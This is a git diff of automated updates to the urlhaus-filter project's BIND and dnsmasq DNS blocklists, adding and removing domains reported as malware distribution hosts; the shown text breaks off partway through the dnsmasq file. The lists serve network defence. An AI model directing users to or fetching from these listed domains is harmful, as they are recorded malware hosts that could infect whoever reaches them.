diff --git a/urlhaus-filter-bind-online.conf b/urlhaus-filter-bind-online.conf index 77cd021f..1b7b1b7f 100644 --- a/urlhaus-filter-bind-online.conf +++ b/urlhaus-filter-bind-online.conf @@ -1,5 +1,5 @@ # Title: Online Malicious Domains BIND Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -14,6 +14,7 @@ zone "7th-club.com" { type master; notify no; file "null.zone.file"; }; zone "a-reality.co.uk" { type master; notify no; file "null.zone.file"; }; zone "abass.ir" { type master; notify no; file "null.zone.file"; }; zone "accessyouraudience.com" { type master; notify no; file "null.zone.file"; }; +zone "acteon.com.ar" { type master; notify no; file "null.zone.file"; }; zone "activecost.com.au" { type master; notify no; file "null.zone.file"; }; zone "admaris.ir" { type master; notify no; file "null.zone.file"; }; zone "admin.foa.ae" { type master; notify no; file "null.zone.file"; }; @@ -23,6 +24,8 @@ zone "aite.me" { type master; notify no; file "null.zone.file"; }; zone "al-wahd.com" { type master; notify no; file "null.zone.file"; }; zone "alacatibisiklet.com" { type master; notify no; file "null.zone.file"; }; zone "alba1004.co.kr" { type master; notify no; file "null.zone.file"; }; +zone "alexliasko.co.ug" { type master; notify no; file "null.zone.file"; }; +zone "alexliasko.ug" { type master; notify no; file "null.zone.file"; }; zone "algorithmshargh.com" { type master; notify no; file "null.zone.file"; }; zone "allloveseries.com" { type master; notify no; file "null.zone.file"; }; zone "alohasoftware.net" { type master; notify no; file "null.zone.file"; }; @@ -49,6 +52,7 @@ zone "azmeasurement.com" { type master; notify no; file "null.zone.file"; }; zone "azzd.co.kr" { type master; notify no; file "null.zone.file"; }; zone "b.frefou.ru" { type master; notify no; file "null.zone.file"; }; zone "babaroadways.in" { type master; notify no; file "null.zone.file"; }; +zone "backgrounds.pk" { type master; notify no; file "null.zone.file"; }; zone "bamakobleach.free.fr" { type master; notify no; file "null.zone.file"; }; zone "bangkok-orchids.com" { type master; notify no; file "null.zone.file"; }; zone "bapo.granudan.cn" { type master; notify no; file "null.zone.file"; }; @@ -67,7 +71,6 @@ zone "c.vvvvvvvvv.ga" { type master; notify no; file "null.zone.file"; }; zone "cameli.vn" { type master; notify no; file "null.zone.file"; }; zone "cameraforce.tv" { type master; notify no; file "null.zone.file"; }; zone "cbk.m.dodo52.com" { type master; notify no; file "null.zone.file"; }; -zone "cdn-10049480.file.myqcloud.com" { type master; notify no; file "null.zone.file"; }; zone "cellas.sk" { type master; notify no; file "null.zone.file"; }; zone "cf.uuu9.com" { type master; notify no; file "null.zone.file"; }; zone "cfs5.tistory.com" { type master; notify no; file "null.zone.file"; }; @@ -82,16 +85,13 @@ zone "chuckweiss.com" { type master; notify no; file "null.zone.file"; }; zone "cjto.top" { type master; notify no; file "null.zone.file"; }; zone "ckl6767.com" { type master; notify no; file "null.zone.file"; }; zone "clearwaterriveroutfitting.com" { type master; notify no; file "null.zone.file"; }; -zone "colourcreative.co.za" { type master; notify no; file "null.zone.file"; }; zone "commaa.com" { type master; notify no; file "null.zone.file"; }; zone "complan.hu" { type master; notify no; file "null.zone.file"; }; zone "complanbt.hu" { type master; notify no; file "null.zone.file"; }; zone "comtechadsl.com" { type master; notify no; file "null.zone.file"; }; -zone "config.cqhbkjzx.com" { type master; notify no; file "null.zone.file"; }; zone "config.kuaisousou.top" { type master; notify no; file "null.zone.file"; }; -zone "config.wwmhdq.com" { type master; notify no; file "null.zone.file"; }; +zone "config.younoteba.top" { type master; notify no; file "null.zone.file"; }; zone "cqjcc.org" { type master; notify no; file "null.zone.file"; }; -zone "crc2k18.mooo.com" { type master; notify no; file "null.zone.file"; }; zone "crisalic.fr" { type master; notify no; file "null.zone.file"; }; zone "crittersbythebay.com" { type master; notify no; file "null.zone.file"; }; zone "csnserver.com" { type master; notify no; file "null.zone.file"; }; @@ -104,6 +104,7 @@ zone "d9.99ddd.com" { type master; notify no; file "null.zone.file"; }; zone "da.alibuf.com" { type master; notify no; file "null.zone.file"; }; zone "danielbastos.com" { type master; notify no; file "null.zone.file"; }; zone "darco.pk" { type master; notify no; file "null.zone.file"; }; +zone "data.kaoyany.top" { type master; notify no; file "null.zone.file"; }; zone "data.over-blog-kiwi.com" { type master; notify no; file "null.zone.file"; }; zone "datapolish.com" { type master; notify no; file "null.zone.file"; }; zone "datvensaigon.com" { type master; notify no; file "null.zone.file"; }; @@ -162,13 +163,13 @@ zone "download.zjsyawqj.cn" { type master; notify no; file "null.zone.file"; }; zone "download301.wanmei.com" { type master; notify no; file "null.zone.file"; }; zone "dpeasesummithilltoppers.pbworks.com" { type master; notify no; file "null.zone.file"; }; zone "drools-moved.46999.n3.nabble.com" { type master; notify no; file "null.zone.file"; }; +zone "dudulm.com" { type master; notify no; file "null.zone.file"; }; zone "dw.58wangdun.com" { type master; notify no; file "null.zone.file"; }; zone "dx.qqyewu.com" { type master; notify no; file "null.zone.file"; }; zone "dx1.qqtn.com" { type master; notify no; file "null.zone.file"; }; zone "dx2.qqtn.com" { type master; notify no; file "null.zone.file"; }; zone "dzinestudio87.co.uk" { type master; notify no; file "null.zone.file"; }; zone "e.dangeana.com" { type master; notify no; file "null.zone.file"; }; -zone "ecoshore.ga" { type master; notify no; file "null.zone.file"; }; zone "edicolanazionale.it" { type master; notify no; file "null.zone.file"; }; zone "elokshinproperty.co.za" { type master; notify no; file "null.zone.file"; }; zone "emadamini.co.za" { type master; notify no; file "null.zone.file"; }; @@ -183,6 +184,7 @@ zone "expdom.ru" { type master; notify no; file "null.zone.file"; }; zone "ezfintechcorp.com" { type master; notify no; file "null.zone.file"; }; zone "fatherchildless.com" { type master; notify no; file "null.zone.file"; }; zone "fidiag.kymco.com" { type master; notify no; file "null.zone.file"; }; +zone "files.fqapps.com" { type master; notify no; file "null.zone.file"; }; zone "files.rakbot.ru" { type master; notify no; file "null.zone.file"; }; zone "files6.uludagbilisim.com" { type master; notify no; file "null.zone.file"; }; zone "fishingbigstore.com" { type master; notify no; file "null.zone.file"; }; @@ -191,6 +193,7 @@ zone "fkd.derpcity.ru" { type master; notify no; file "null.zone.file"; }; zone "fotobooth.at" { type master; notify no; file "null.zone.file"; }; zone "frin.ng" { type master; notify no; file "null.zone.file"; }; zone "fstation.dynu.net" { type master; notify no; file "null.zone.file"; }; +zone "fte.m.dodo52.com" { type master; notify no; file "null.zone.file"; }; zone "ftpftpftp.com" { type master; notify no; file "null.zone.file"; }; zone "funletters.net" { type master; notify no; file "null.zone.file"; }; zone "fusionfiresolutions.com" { type master; notify no; file "null.zone.file"; }; @@ -208,6 +211,7 @@ zone "go.xsuad.com" { type master; notify no; file "null.zone.file"; }; zone "gothw.club" { type master; notify no; file "null.zone.file"; }; zone "grafchekloder.rebatesrule.net" { type master; notify no; file "null.zone.file"; }; zone "greattastesmb.ca" { type master; notify no; file "null.zone.file"; }; +zone "greenpalace.top" { type master; notify no; file "null.zone.file"; }; zone "gssgroups.com" { type master; notify no; file "null.zone.file"; }; zone "gvpcdpgc.edu.in" { type master; notify no; file "null.zone.file"; }; zone "habbotips.free.fr" { type master; notify no; file "null.zone.file"; }; @@ -220,7 +224,9 @@ zone "herrdangwerder.de" { type master; notify no; file "null.zone.file"; }; zone "hfsoftware.cl" { type master; notify no; file "null.zone.file"; }; zone "hldschool.com" { type master; notify no; file "null.zone.file"; }; zone "hmbwgroup.com" { type master; notify no; file "null.zone.file"; }; +zone "hoayeuthuong-my.sharepoint.com" { type master; notify no; file "null.zone.file"; }; zone "hostzaa.com" { type master; notify no; file "null.zone.file"; }; +zone "hotart.co.nz" { type master; notify no; file "null.zone.file"; }; zone "hotel-le-relais-des-moulins.com" { type master; notify no; file "null.zone.file"; }; zone "housewifes.co" { type master; notify no; file "null.zone.file"; }; zone "hseda.com" { type master; notify no; file "null.zone.file"; }; @@ -232,10 +238,12 @@ zone "impression-gobelet.com" { type master; notify no; file "null.zone.file"; } zone "inapadvance.com" { type master; notify no; file "null.zone.file"; }; zone "incrediblepixels.com" { type master; notify no; file "null.zone.file"; }; zone "incredicole.com" { type master; notify no; file "null.zone.file"; }; +zone "inigbiseijfji.ru" { type master; notify no; file "null.zone.file"; }; zone "intersel-idf.org" { type master; notify no; file "null.zone.file"; }; zone "isso.ps" { type master; notify no; file "null.zone.file"; }; zone "itd.m.dodo52.com" { type master; notify no; file "null.zone.file"; }; zone "jamiekaylive.com" { type master; notify no; file "null.zone.file"; }; +zone "jamshed.pk" { type master; notify no; file "null.zone.file"; }; zone "jansen-heesch.nl" { type master; notify no; file "null.zone.file"; }; zone "janvierassocies.fr" { type master; notify no; file "null.zone.file"; }; zone "javatank.ru" { type master; notify no; file "null.zone.file"; }; @@ -246,16 +254,16 @@ zone "jsq.m.dodo52.com" { type master; notify no; file "null.zone.file"; }; zone "jsya.co.kr" { type master; notify no; file "null.zone.file"; }; zone "jutvac.com" { type master; notify no; file "null.zone.file"; }; zone "jvalert.com" { type master; notify no; file "null.zone.file"; }; +zone "k.ludong.tv" { type master; notify no; file "null.zone.file"; }; zone "kachsurf.mylftv.com" { type master; notify no; file "null.zone.file"; }; zone "kamasu11.cafe24.com" { type master; notify no; file "null.zone.file"; }; -zone "kankalarnetwork.duckdns.org" { type master; notify no; file "null.zone.file"; }; zone "kanok.co.th" { type master; notify no; file "null.zone.file"; }; +zone "kanorkanor23.ru" { type master; notify no; file "null.zone.file"; }; zone "karavantekstil.com" { type master; notify no; file "null.zone.file"; }; zone "kdsp.co.kr" { type master; notify no; file "null.zone.file"; }; zone "kejpa.com" { type master; notify no; file "null.zone.file"; }; zone "kjbm9.mof.gov.cn" { type master; notify no; file "null.zone.file"; }; zone "kjcpromo.com" { type master; notify no; file "null.zone.file"; }; -zone "kleinendeli.co.za" { type master; notify no; file "null.zone.file"; }; zone "knightsbridgeenergy.com.ng" { type master; notify no; file "null.zone.file"; }; zone "kwanfromhongkong.com" { type master; notify no; file "null.zone.file"; }; zone "lameguard.ru" { type master; notify no; file "null.zone.file"; }; @@ -283,10 +291,11 @@ zone "lvr.samacomplus.com" { type master; notify no; file "null.zone.file"; }; zone "m.0757kd.cn" { type master; notify no; file "null.zone.file"; }; zone "m93701t2.beget.tech" { type master; notify no; file "null.zone.file"; }; zone "mackleyn.com" { type master; notify no; file "null.zone.file"; }; +zone "mammalson.com" { type master; notify no; file "null.zone.file"; }; zone "maringareservas.com.br" { type master; notify no; file "null.zone.file"; }; zone "marketinfosales.com" { type master; notify no; file "null.zone.file"; }; zone "marketprice.com.ng" { type master; notify no; file "null.zone.file"; }; -zone "mattayom31.go.th" { type master; notify no; file "null.zone.file"; }; +zone "marksidfgs.ug" { type master; notify no; file "null.zone.file"; }; zone "mazury4x4.pl" { type master; notify no; file "null.zone.file"; }; zone "mbgrm.com" { type master; notify no; file "null.zone.file"; }; zone "medianews.ge" { type master; notify no; file "null.zone.file"; }; @@ -305,7 +314,6 @@ zone "mfevr.com" { type master; notify no; file "null.zone.file"; }; zone "mffyjcdn.btgame.com" { type master; notify no; file "null.zone.file"; }; zone "mhkdhotbot.myvnc.com" { type master; notify no; file "null.zone.file"; }; zone "mhkdhotbot80.myvnc.com" { type master; notify no; file "null.zone.file"; }; -zone "micahproducts.com" { type master; notify no; file "null.zone.file"; }; zone "micalle.com.au" { type master; notify no; file "null.zone.file"; }; zone "migmon.club" { type master; notify no; file "null.zone.file"; }; zone "mikrokaynakmerkezi.com" { type master; notify no; file "null.zone.file"; }; @@ -326,6 +334,8 @@ zone "msecurity.ro" { type master; notify no; file "null.zone.file"; }; zone "mteng.mmj7.com" { type master; notify no; file "null.zone.file"; }; zone "mtfelektroteknik.com" { type master; notify no; file "null.zone.file"; }; zone "mueblesjcp.cl" { type master; notify no; file "null.zone.file"; }; +zone "mutec.jp" { type master; notify no; file "null.zone.file"; }; +zone "mv360.net" { type master; notify no; file "null.zone.file"; }; zone "mvb.kz" { type master; notify no; file "null.zone.file"; }; zone "mxpiqw.am.files.1drv.com" { type master; notify no; file "null.zone.file"; }; zone "mynydd-ednyfed-countryhouse.co.uk" { type master; notify no; file "null.zone.file"; }; @@ -335,11 +345,13 @@ zone "mytrains.net" { type master; notify no; file "null.zone.file"; }; zone "mywp.asia" { type master; notify no; file "null.zone.file"; }; zone "namuvpn.com" { type master; notify no; file "null.zone.file"; }; zone "narty.laserteam.pl" { type master; notify no; file "null.zone.file"; }; +zone "ndrs.cloud" { type master; notify no; file "null.zone.file"; }; zone "nebraskacharters.com.au" { type master; notify no; file "null.zone.file"; }; zone "neocity1.free.fr" { type master; notify no; file "null.zone.file"; }; zone "nerve.untergrund.net" { type master; notify no; file "null.zone.file"; }; zone "news.omumusic.net" { type master; notify no; file "null.zone.file"; }; zone "newsun-shop.com" { type master; notify no; file "null.zone.file"; }; +zone "ngoaingu.garage.com.vn" { type master; notify no; file "null.zone.file"; }; zone "nofound.000webhostapp.com" { type master; notify no; file "null.zone.file"; }; zone "norperuinge.com.pe" { type master; notify no; file "null.zone.file"; }; zone "nprg.ru" { type master; notify no; file "null.zone.file"; }; @@ -376,7 +388,6 @@ zone "pcsoori.com" { type master; notify no; file "null.zone.file"; }; zone "pedidoslalacteo.com.ar" { type master; notify no; file "null.zone.file"; }; zone "perfectshinehair.co.uk" { type master; notify no; file "null.zone.file"; }; zone "ph4s.ru" { type master; notify no; file "null.zone.file"; }; -zone "phamchilong.com" { type master; notify no; file "null.zone.file"; }; zone "phudieusongma.com" { type master; notify no; file "null.zone.file"; }; zone "pink99.com" { type master; notify no; file "null.zone.file"; }; zone "poisss.jhfddd.com" { type master; notify no; file "null.zone.file"; }; @@ -385,7 +396,6 @@ zone "ppl.ac.id" { type master; notify no; file "null.zone.file"; }; zone "prestigehomeautomation.net" { type master; notify no; file "null.zone.file"; }; zone "probost.cz" { type master; notify no; file "null.zone.file"; }; zone "prosoc.nl" { type master; notify no; file "null.zone.file"; }; -zone "protestlabsmovings.es" { type master; notify no; file "null.zone.file"; }; zone "prowin.co.th" { type master; notify no; file "null.zone.file"; }; zone "pujashoppe.in" { type master; notify no; file "null.zone.file"; }; zone "purelondonhyg.com" { type master; notify no; file "null.zone.file"; }; @@ -417,7 +427,6 @@ zone "ruisgood.ru" { type master; notify no; file "null.zone.file"; }; zone "rusch.nu" { type master; notify no; file "null.zone.file"; }; zone "s.51shijuan.com" { type master; notify no; file "null.zone.file"; }; zone "s.kk30.com" { type master; notify no; file "null.zone.file"; }; -zone "s289428.smrtp.ru" { type master; notify no; file "null.zone.file"; }; zone "saboorjaam.ir" { type master; notify no; file "null.zone.file"; }; zone "sadiqgill.com" { type master; notify no; file "null.zone.file"; }; zone "sahathaikasetpan.com" { type master; notify no; file "null.zone.file"; }; @@ -438,6 +447,7 @@ zone "simlun.com.ar" { type master; notify no; file "null.zone.file"; }; zone "sinastorage.cn" { type master; notify no; file "null.zone.file"; }; zone "sindicato1ucm.cl" { type master; notify no; file "null.zone.file"; }; zone "skyscan.com" { type master; notify no; file "null.zone.file"; }; +zone "sl9XA73g7u3EO07WT42n7f4vIn5fZH.biz" { type master; notify no; file "null.zone.file"; }; zone "small-business-solutions.biz" { type master; notify no; file "null.zone.file"; }; zone "small.962.net" { type master; notify no; file "null.zone.file"; }; zone "smccycles.com" { type master; notify no; file "null.zone.file"; }; @@ -462,8 +472,8 @@ zone "swwbia.com" { type master; notify no; file "null.zone.file"; }; zone "symanreni.mysecondarydns.com" { type master; notify no; file "null.zone.file"; }; zone "szxypt.com" { type master; notify no; file "null.zone.file"; }; zone "t.honker.info" { type master; notify no; file "null.zone.file"; }; -zone "tandenblekenhoofddorp.nl" { type master; notify no; file "null.zone.file"; }; zone "tattooartcreations.com" { type master; notify no; file "null.zone.file"; }; +zone "taxpos.com" { type master; notify no; file "null.zone.file"; }; zone "tcy.198424.com" { type master; notify no; file "null.zone.file"; }; zone "tehrenberg.com" { type master; notify no; file "null.zone.file"; }; zone "telescopelms.com" { type master; notify no; file "null.zone.file"; }; @@ -476,6 +486,7 @@ zone "thc-annex.com" { type master; notify no; file "null.zone.file"; }; zone "theprestige.ro" { type master; notify no; file "null.zone.file"; }; zone "theptiendat.com" { type master; notify no; file "null.zone.file"; }; zone "therecruiter.io" { type master; notify no; file "null.zone.file"; }; +zone "thorn-bikes.com" { type master; notify no; file "null.zone.file"; }; zone "thosewebbs.com" { type master; notify no; file "null.zone.file"; }; zone "tianangdep.com" { type master; notify no; file "null.zone.file"; }; zone "tibinst.mefound.com" { type master; notify no; file "null.zone.file"; }; @@ -484,12 +495,12 @@ zone "tishreycarmelim.co.il" { type master; notify no; file "null.zone.file"; }; zone "tonydong.com" { type master; notify no; file "null.zone.file"; }; zone "tonyzone.com" { type master; notify no; file "null.zone.file"; }; zone "totebarreto.com.br" { type master; notify no; file "null.zone.file"; }; +zone "tribunal.ug" { type master; notify no; file "null.zone.file"; }; zone "tsd.jxwan.com" { type master; notify no; file "null.zone.file"; }; zone "tulli.info" { type master; notify no; file "null.zone.file"; }; zone "tuneup.ibk.me" { type master; notify no; file "null.zone.file"; }; zone "tutuler.com" { type master; notify no; file "null.zone.file"; }; zone "uc-56.ru" { type master; notify no; file "null.zone.file"; }; -zone "ucto-id.cz" { type master; notify no; file "null.zone.file"; }; zone "ugc.wegame.com.cn" { type master; notify no; file "null.zone.file"; }; zone "ukks.net" { type master; notify no; file "null.zone.file"; }; zone "ukronet.ru" { type master; notify no; file "null.zone.file"; }; @@ -503,13 +514,16 @@ zone "urquilam.com.ar" { type master; notify no; file "null.zone.file"; }; zone "usd-gold.com" { type master; notify no; file "null.zone.file"; }; zone "uskeba.ca" { type master; notify no; file "null.zone.file"; }; zone "usmadetshirts.com" { type master; notify no; file "null.zone.file"; }; +zone "uytgvhdfsdxc.ug" { type master; notify no; file "null.zone.file"; }; zone "vadyur.github.io" { type master; notify no; file "null.zone.file"; }; zone "valedchap.ir" { type master; notify no; file "null.zone.file"; }; zone "valencaagora.com.br" { type master; notify no; file "null.zone.file"; }; zone "vaziri.echobit.ir" { type master; notify no; file "null.zone.file"; }; +zone "veyron.ir" { type master; notify no; file "null.zone.file"; }; zone "vfocus.net" { type master; notify no; file "null.zone.file"; }; zone "videoswebcammsn.free.fr" { type master; notify no; file "null.zone.file"; }; zone "vitinhvnt.com" { type master; notify no; file "null.zone.file"; }; +zone "wap.dosame.com" { type master; notify no; file "null.zone.file"; }; zone "warriorllc.com" { type master; notify no; file "null.zone.file"; }; zone "wbd.5636.com" { type master; notify no; file "null.zone.file"; }; zone "webarte.com.br" { type master; notify no; file "null.zone.file"; }; @@ -526,7 +540,6 @@ zone "wsg.com.sg" { type master; notify no; file "null.zone.file"; }; zone "www2.recepty5.com" { type master; notify no; file "null.zone.file"; }; zone "x2vn.com" { type master; notify no; file "null.zone.file"; }; zone "xantinas.com" { type master; notify no; file "null.zone.file"; }; -zone "xpodip.ir" { type master; notify no; file "null.zone.file"; }; zone "xtremeforumz.com" { type master; notify no; file "null.zone.file"; }; zone "yeez.net" { type master; notify no; file "null.zone.file"; }; zone "yesky.51down.org.cn" { type master; notify no; file "null.zone.file"; }; @@ -537,6 +550,9 @@ zone "yy31t.chokun.ru" { type master; notify no; file "null.zone.file"; }; zone "zagruz.dnset.com" { type master; notify no; file "null.zone.file"; }; zone "zagruz.toh.info" { type master; notify no; file "null.zone.file"; }; zone "zagruz.zyns.com" { type master; notify no; file "null.zone.file"; }; +zone "zaragoza.co.ug" { type master; notify no; file "null.zone.file"; }; +zone "zaragozsa.ug" { type master; notify no; file "null.zone.file"; }; +zone "zd4b.lonlyfafner.ru" { type master; notify no; file "null.zone.file"; }; zone "zdy.17110.com" { type master; notify no; file "null.zone.file"; }; zone "zeytinyagisabun.com" { type master; notify no; file "null.zone.file"; }; zone "zhetysu360.kz" { type master; notify no; file "null.zone.file"; }; diff --git a/urlhaus-filter-bind.conf b/urlhaus-filter-bind.conf index 19e66683..01e17e6f 100644 --- a/urlhaus-filter-bind.conf +++ b/urlhaus-filter-bind.conf @@ -1,5 +1,5 @@ # Title: Malicious Domains BIND Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -3752,6 +3752,8 @@ zone "alexfranco.co" { type master; notify no; file "null.zone.file"; }; zone "alexgarkavenko.com" { type master; notify no; file "null.zone.file"; }; zone "alexhhh.chat.ru" { type master; notify no; file "null.zone.file"; }; zone "alexis.monville.com" { type master; notify no; file "null.zone.file"; }; +zone "alexliasko.co.ug" { type master; notify no; file "null.zone.file"; }; +zone "alexliasko.ug" { type master; notify no; file "null.zone.file"; }; zone "alexm.co.za" { type master; notify no; file "null.zone.file"; }; zone "alexovicsattila.com" { type master; notify no; file "null.zone.file"; }; zone "alexpopow.com" { type master; notify no; file "null.zone.file"; }; @@ -15204,6 +15206,7 @@ zone "clicklenderz.com" { type master; notify no; file "null.zone.file"; }; zone "clicknaranja.mx" { type master; notify no; file "null.zone.file"; }; zone "clickneat.be" { type master; notify no; file "null.zone.file"; }; zone "clicknit.com" { type master; notify no; file "null.zone.file"; }; +zone "clickon.vn" { type master; notify no; file "null.zone.file"; }; zone "clickprintnow.com.au" { type master; notify no; file "null.zone.file"; }; zone "clickripplesolutions.in" { type master; notify no; file "null.zone.file"; }; zone "clicksbyayush.com" { type master; notify no; file "null.zone.file"; }; @@ -18223,7 +18226,6 @@ zone "dato.co.at" { type master; notify no; file "null.zone.file"; }; zone "datongsafe-taipei.org.tw" { type master; notify no; file "null.zone.file"; }; zone "datos.com.tw" { type master; notify no; file "null.zone.file"; }; zone "datos.com.ua" { type master; notify no; file "null.zone.file"; }; -zone "datphatlocsg.com" { type master; notify no; file "null.zone.file"; }; zone "datpq.com" { type master; notify no; file "null.zone.file"; }; zone "datrangsuc.com" { type master; notify no; file "null.zone.file"; }; zone "datrephuquoc.net" { type master; notify no; file "null.zone.file"; }; @@ -21346,7 +21348,6 @@ zone "dpacorp.org" { type master; notify no; file "null.zone.file"; }; zone "dparmm1.wci.com.ph" { type master; notify no; file "null.zone.file"; }; zone "dpbh.info" { type master; notify no; file "null.zone.file"; }; zone "dpbusinessportal.ro" { type master; notify no; file "null.zone.file"; }; -zone "dpcservizi.it" { type master; notify no; file "null.zone.file"; }; zone "dpe.com.tw" { type master; notify no; file "null.zone.file"; }; zone "dpeasesummithilltoppers.pbworks.com" { type master; notify no; file "null.zone.file"; }; zone "dpersonnel.ru" { type master; notify no; file "null.zone.file"; }; @@ -24343,7 +24344,6 @@ zone "esitsecurity.com" { type master; notify no; file "null.zone.file"; }; zone "eskaledoor.com" { type master; notify no; file "null.zone.file"; }; zone "eskandarb.com" { type master; notify no; file "null.zone.file"; }; zone "eskeleco.ir" { type master; notify no; file "null.zone.file"; }; -zone "eskenazo.cl" { type master; notify no; file "null.zone.file"; }; zone "eski.elt.com.tr" { type master; notify no; file "null.zone.file"; }; zone "eskilloo.com" { type master; notify no; file "null.zone.file"; }; zone "eskimue.de" { type master; notify no; file "null.zone.file"; }; @@ -41663,7 +41663,6 @@ zone "library8.bimvimdan.tk" { type master; notify no; file "null.zone.file"; }; zone "libreentreprisemagazine.com" { type master; notify no; file "null.zone.file"; }; zone "libroglobale.bid" { type master; notify no; file "null.zone.file"; }; zone "librores.press" { type master; notify no; file "null.zone.file"; }; -zone "librusfan.ru" { type master; notify no; file "null.zone.file"; }; zone "libtech.com.au" { type master; notify no; file "null.zone.file"; }; zone "libya-info.com" { type master; notify no; file "null.zone.file"; }; zone "libyabeach.tk" { type master; notify no; file "null.zone.file"; }; @@ -44363,6 +44362,7 @@ zone "mambaddd4.ru" { type master; notify no; file "null.zone.file"; }; zone "mambilerzonaldistrict.tk" { type master; notify no; file "null.zone.file"; }; zone "mameradirastislavice.sk" { type master; notify no; file "null.zone.file"; }; zone "maminsecret.ru" { type master; notify no; file "null.zone.file"; }; +zone "mammalson.com" { type master; notify no; file "null.zone.file"; }; zone "mammothstraw.com" { type master; notify no; file "null.zone.file"; }; zone "mamnonmangnondanang.edu.vn" { type master; notify no; file "null.zone.file"; }; zone "mamnontohienthanh.com" { type master; notify no; file "null.zone.file"; }; @@ -49093,7 +49093,6 @@ zone "nannyservices101.com" { type master; notify no; file "null.zone.file"; }; zone "nano40.com" { type master; notify no; file "null.zone.file"; }; zone "nanobiteuae.com" { type master; notify no; file "null.zone.file"; }; zone "nanobrain.co.kr" { type master; notify no; file "null.zone.file"; }; -zone "nanodigestmag.com" { type master; notify no; file "null.zone.file"; }; zone "nanodivulga.ufn.edu.br" { type master; notify no; file "null.zone.file"; }; zone "nanogagliato.com" { type master; notify no; file "null.zone.file"; }; zone "nanohair.com.au" { type master; notify no; file "null.zone.file"; }; @@ -50818,6 +50817,7 @@ zone "novaland.cl" { type master; notify no; file "null.zone.file"; }; zone "novamentemagra.com.br" { type master; notify no; file "null.zone.file"; }; zone "novametal.cl" { type master; notify no; file "null.zone.file"; }; zone "novaoptica.pt" { type master; notify no; file "null.zone.file"; }; +zone "novapisa.com" { type master; notify no; file "null.zone.file"; }; zone "novaplaza.com" { type master; notify no; file "null.zone.file"; }; zone "novaproductionsomaha.com" { type master; notify no; file "null.zone.file"; }; zone "novaprotravel.com" { type master; notify no; file "null.zone.file"; }; @@ -54757,7 +54757,6 @@ zone "playstationgame.tk" { type master; notify no; file "null.zone.file"; }; zone "playtech.ddnsking.com" { type master; notify no; file "null.zone.file"; }; zone "playtech.id" { type master; notify no; file "null.zone.file"; }; zone "playthefinancialgame.com" { type master; notify no; file "null.zone.file"; }; -zone "playvideo.site" { type master; notify no; file "null.zone.file"; }; zone "plaza-beauty.ru" { type master; notify no; file "null.zone.file"; }; zone "plazacolibri.com.mx" { type master; notify no; file "null.zone.file"; }; zone "plazadomino.com" { type master; notify no; file "null.zone.file"; }; @@ -60538,7 +60537,6 @@ zone "salezietes.lt" { type master; notify no; file "null.zone.file"; }; zone "salght.com" { type master; notify no; file "null.zone.file"; }; zone "salheshthemovie.com" { type master; notify no; file "null.zone.file"; }; zone "salientbrands.com" { type master; notify no; file "null.zone.file"; }; -zone "salifkeita.net" { type master; notify no; file "null.zone.file"; }; zone "salimoni.ru" { type master; notify no; file "null.zone.file"; }; zone "saling-klimatyzacje.pl" { type master; notify no; file "null.zone.file"; }; zone "salinzada.com" { type master; notify no; file "null.zone.file"; }; @@ -69900,7 +69898,6 @@ zone "thuyluckhinen.com.vn" { type master; notify no; file "null.zone.file"; }; zone "thuysankv1.com" { type master; notify no; file "null.zone.file"; }; zone "thuysinhlongthanh.com" { type master; notify no; file "null.zone.file"; }; zone "thuytienacademy.com" { type master; notify no; file "null.zone.file"; }; -zone "thyamasr.com" { type master; notify no; file "null.zone.file"; }; zone "thymedentalcare.com" { type master; notify no; file "null.zone.file"; }; zone "thyroidnutritioneducators.com" { type master; notify no; file "null.zone.file"; }; zone "thyrsi.com" { type master; notify no; file "null.zone.file"; }; @@ -70181,6 +70178,7 @@ zone "tk-pikpg.sch.id" { type master; notify no; file "null.zone.file"; }; zone "tk-spectrans.ru" { type master; notify no; file "null.zone.file"; }; zone "tkalniaobrazu.pl" { type master; notify no; file "null.zone.file"; }; zone "tkaystore.com" { type master; notify no; file "null.zone.file"; }; +zone "tkb.com.tw" { type master; notify no; file "null.zone.file"; }; zone "tkbc.co.za" { type master; notify no; file "null.zone.file"; }; zone "tkbhaktimulya.web.id" { type master; notify no; file "null.zone.file"; }; zone "tkconcept.vn" { type master; notify no; file "null.zone.file"; }; diff --git a/urlhaus-filter-dnsmasq-online.conf b/urlhaus-filter-dnsmasq-online.conf index 6e92c658..cda1c2b7 100644 --- a/urlhaus-filter-dnsmasq-online.conf +++ b/urlhaus-filter-dnsmasq-online.conf @@ -1,5 +1,5 @@ # Title: Online Malicious Domains dnsmasq Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -14,6 +14,7 @@ address=/7th-club.com/0.0.0.0 address=/a-reality.co.uk/0.0.0.0 address=/abass.ir/0.0.0.0 address=/accessyouraudience.com/0.0.0.0 +address=/acteon.com.ar/0.0.0.0 address=/activecost.com.au/0.0.0.0 address=/admaris.ir/0.0.0.0 address=/admin.foa.ae/0.0.0.0 @@ -23,6 +24,8 @@ address=/aite.me/0.0.0.0 address=/al-wahd.com/0.0.0.0 address=/alacatibisiklet.com/0.0.0.0 address=/alba1004.co.kr/0.0.0.0 +address=/alexliasko.co.ug/0.0.0.0 +address=/alexliasko.ug/0.0.0.0 address=/algorithmshargh.com/0.0.0.0 address=/allloveseries.com/0.0.0.0 address=/alohasoftware.net/0.0.0.0 @@ -49,6 +52,7 @@ address=/azmeasurement.com/0.0.0.0 address=/azzd.co.kr/0.0.0.0 address=/b.frefou.ru/0.0.0.0 address=/babaroadways.in/0.0.0.0 +address=/backgrounds.pk/0.0.0.0 address=/bamakobleach.free.fr/0.0.0.0 address=/bangkok-orchids.com/0.0.0.0 address=/bapo.granudan.cn/0.0.0.0 @@ -67,7 +71,6 @@ address=/c.vvvvvvvvv.ga/0.0.0.0 address=/cameli.vn/0.0.0.0 address=/cameraforce.tv/0.0.0.0 address=/cbk.m.dodo52.com/0.0.0.0 -address=/cdn-10049480.file.myqcloud.com/0.0.0.0 address=/cellas.sk/0.0.0.0 address=/cf.uuu9.com/0.0.0.0 